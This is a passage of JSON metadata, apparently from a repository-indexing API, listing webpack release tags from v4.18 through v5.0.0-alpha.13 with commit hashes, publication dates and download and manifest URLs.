58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1